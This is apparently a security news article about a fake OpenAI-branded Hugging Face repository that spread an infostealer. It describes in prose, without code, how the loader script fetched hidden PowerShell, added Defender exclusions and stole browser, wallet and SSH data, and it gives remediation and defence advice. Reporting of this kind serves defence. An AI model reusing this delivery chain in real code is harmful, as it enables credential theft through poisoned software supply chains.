Fake OpenAI Hugging Face Repository Pushes Infostealer Malware: What Users Need to Know

The rapid growth of artificial intelligence has created new opportunities for developers, researchers, startups, and enterprises. Platforms such as Hugging Face have become essential spaces for sharing AI models, datasets, demos, and machine learning tools. However, this same popularity has also made AI ecosystems attractive targets for cybercriminals.

A recent malware campaign involving a fake OpenAI-themed repository on Hugging Face shows how attackers are now exploiting trust in major AI brands to distribute dangerous software. The malicious repository, named Open-OSS/privacy-filter, impersonated OpenAI’s legitimate “Privacy Filter” project and was reportedly used to deliver information-stealing malware to Windows users.

The incident is a serious reminder that the AI supply chain is now part of the cybersecurity battlefield. Developers, researchers, and companies using open-source AI tools must treat model repositories, scripts, and loaders with the same caution they apply to traditional software packages.

A Fake OpenAI Repository Reaches Hugging Face’s Trending List

According to the reported findings, the malicious Hugging Face repository briefly reached the platform’s trending list and climbed as high as the number one position. Before removal, it accumulated around 244,000 downloads, making the campaign especially alarming for users who may have trusted the repository because of its visibility.

The repository was designed to look legitimate. It copied much of the appearance and language of OpenAI’s Privacy Filter project, creating the impression that it was connected to a real AI privacy tool. This technique is known as typosquatting or brand impersonation. Attackers create names, pages, or packages that closely resemble trusted projects in order to trick users into downloading malicious files.

In this case, the repository reportedly used the name Open-OSS/privacy-filter, a name that could easily be mistaken for an official or community-supported OpenAI-related project. For busy developers searching for tools quickly, that kind of naming can be enough to cause confusion.

How the Malware Delivery Worked

The malicious repository reportedly included a file called loader.py. On the surface, this Python script appeared to contain harmless AI-related code. That was part of the deception. The script was designed to look normal enough that users might not immediately suspect anything dangerous.

Behind the scenes, however, the script performed suspicious actions. It disabled SSL verification, decoded a base64-encoded URL, connected to an external resource, and retrieved a JSON payload. That payload contained a PowerShell command that executed in a hidden window on Windows machines.

From there, the attack chain continued. The PowerShell command downloaded a batch file named start.bat. This file was used to perform privilege escalation, download the final malware payload, add the payload to Microsoft Defender exclusions, and execute it.

The final payload was described as a Rust-based infostealer known as sefirah. Infostealers are a dangerous category of malware because they are designed to silently collect sensitive information from infected systems and send it to attackers.

What Data Was Targeted?

The malware reportedly targeted a wide range of private and high-value data. This included browser data from Chromium-based and Gecko-based browsers, such as cookies, saved passwords, encryption keys, browsing history, and session tokens.

It also targeted Discord tokens, local databases, cryptocurrency wallets, wallet browser extensions, SSH credentials, FTP credentials, VPN configuration files, and FileZilla data. In addition, the malware searched for sensitive local files, wallet seeds, private keys, system information, and screenshots from multi-monitor setups.

This is especially dangerous because stolen browser sessions and tokens can allow attackers to access accounts without needing the user’s password. Stolen cryptocurrency wallet seeds or private keys can lead to irreversible financial loss. Compromised SSH, FTP, and VPN credentials can also give attackers access to servers, development environments, internal networks, and cloud infrastructure.

The stolen data was reportedly compressed and sent to a command-and-control server using the domain recargapopular[.]com.

Why This Attack Is Important for the AI Community

This campaign is not just another malware story. It highlights a growing security problem in the AI ecosystem. Many developers now download AI models, scripts, notebooks, and tools from public platforms without applying the same level of inspection they would use for traditional software.

AI repositories often contain more than model weights. They may include Python scripts, dependency files, custom loaders, demo apps, configuration files, and automation code. Any of these elements can be abused if users run them without checking what they do.

Attackers understand this. By placing malware inside an AI-related repository and making it appear popular, they can target developers, researchers, students, and companies working with machine learning tools. The fake OpenAI branding increased the credibility of the repository, while its trending status may have encouraged even more downloads.

This is a supply-chain risk. In modern software and AI development, teams often rely on external components. A single malicious script can compromise a developer machine, steal secrets, and potentially expose cloud keys, source code, customer data, or production systems.

Anti-Analysis Features Made the Malware Harder to Detect

The malware reportedly included extensive anti-analysis protections. These features are designed to detect whether the malware is running inside a virtual machine, sandbox, debugger, or malware analysis environment.

Security researchers often use these controlled environments to study malware safely. By detecting them, malicious software can change its behavior, stop running, or hide its real activity. This makes analysis more difficult and can help malware avoid detection by automated security systems.

The use of anti-analysis features suggests that the attackers were not simply experimenting. The campaign appears to have been built with a strong awareness of modern malware detection methods.

Download Numbers May Have Been Manipulated

Although the repository reportedly reached 244,000 downloads, the true number of infected victims remains unclear. Researchers noted that many of the accounts that liked the malicious repository appeared to be auto-generated. This raises the possibility that the download count and popularity signals were artificially inflated.

This tactic is common in social engineering. Attackers try to make malicious content appear trusted by increasing likes, stars, downloads, comments, or rankings. Users may assume that a popular repository is safe, but popularity alone is not a security guarantee.

The incident also reportedly led researchers to discover other repositories using the same malicious loader infrastructure. There were also overlaps with an npm typosquatting campaign connected to the WinOS 4.0 implant, showing that attackers may be reusing infrastructure across different developer ecosystems.

What Affected Users Should Do

Anyone who downloaded or ran files from the fake Hugging Face repository should treat the machine as compromised. Because the malware targeted credentials, tokens, wallets, browser sessions, and local files, simple deletion of the repository files is not enough.

The safest response is to reimage the affected machine from a clean source. Users should rotate all stored credentials, reset passwords, invalidate browser sessions, revoke tokens, replace cryptocurrency wallets, and generate new seed phrases. SSH keys, FTP credentials, VPN profiles, API keys, and cloud access tokens should also be replaced.

For businesses, security teams should check endpoint logs, PowerShell execution history, Defender exclusions, unusual network connections, and access logs for developer accounts. Any system that may have used stolen credentials should be reviewed carefully.

How Developers Can Protect Themselves

Developers and AI practitioners should verify repositories before downloading or running code. Repository names, authors, commit history, official links, and file contents should be checked. A repository that claims to be connected to OpenAI, Google, Meta, Anthropic, Microsoft, or another major company should be confirmed through official channels.

Users should avoid running unknown scripts directly on their main machine. Safer options include using isolated virtual machines, containers, restricted environments, and network monitoring. However, because some malware includes anti-analysis features, isolation should not be treated as perfect protection.

It is also important to inspect Python files, shell scripts, batch files, PowerShell commands, and dependency installation steps. Suspicious behavior includes disabling SSL verification, decoding hidden URLs, downloading external payloads, modifying antivirus exclusions, executing hidden PowerShell windows, or requesting unnecessary system privileges.

Organizations should apply strict policies for AI tool adoption. This includes dependency scanning, repository allowlists, endpoint detection, secret management, and developer security training. AI teams should not be separated from normal software supply-chain security processes.

A Warning for the Future of Open-Source AI

The fake OpenAI Hugging Face repository is a clear example of how attackers are adapting to the AI boom. As more developers depend on public model hubs and open-source machine learning tools, cybercriminals will continue looking for ways to exploit trust, urgency, and brand recognition.

Hugging Face and similar platforms have security measures in place, but no public platform can fully eliminate abuse. The responsibility is shared between platforms, researchers, developers, enterprises, and individual users.

The key lesson is simple: AI tools are software, and software can be weaponized. A model repository may look harmless, but if it includes executable code, loaders, scripts, or installation commands, it deserves careful review.

As AI adoption grows, security must grow with it. Developers should treat every download as a potential risk, especially when it comes from a newly created repository, uses a famous brand name, or asks users to run code without clear explanation.

Final Thoughts

The malicious Hugging Face repository impersonating OpenAI’s Privacy Filter project shows how quickly cyber threats can enter trusted AI spaces. By combining brand impersonation, fake popularity, hidden malware delivery, and information-stealing payloads, attackers created a campaign that could have exposed passwords, tokens, wallets, and developer credentials.

For users, the safest approach is caution. For companies, the incident is a reminder that AI supply-chain security is no longer optional. Any organization using open-source AI models or tools should build clear security checks into its workflow.

The future of AI depends not only on innovation but also on trust. Protecting that trust requires stronger verification, safer development habits, and a realistic understanding that cybercriminals are now watching the AI ecosystem closely.